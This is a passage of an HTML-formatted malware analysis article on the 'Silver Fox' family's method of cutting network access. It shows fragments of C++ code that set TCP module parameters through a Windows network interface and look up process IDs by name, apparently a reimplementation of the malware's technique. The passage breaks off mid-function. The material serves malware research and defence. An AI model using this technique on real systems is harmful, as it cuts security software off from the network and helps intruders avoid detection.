none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">NPI_MS_TCP_MODULEID,</span><span style="mso-spacerun:yes;"><span leaf="">   </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// TCP module identifier</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">16,</span><span style="mso-spacerun:yes;"><span leaf="">                             </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// IO code (guessed)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">params, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">sizeof</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">),</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">       </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Input buffer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">                     </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Output buffer (unused)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> result</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">vector</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> GetPidsByProcessName</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">const</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">wstring</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> processName</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">std</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">::</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">vector</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&lt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">HANDLE snapshot </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> CreateToolhelp32Snapshot</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">TH32CS_SNAPPROCESS, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> INVALID_HANDLE_VALUE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[!] CreateToolhelp32Snapshot failed.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span 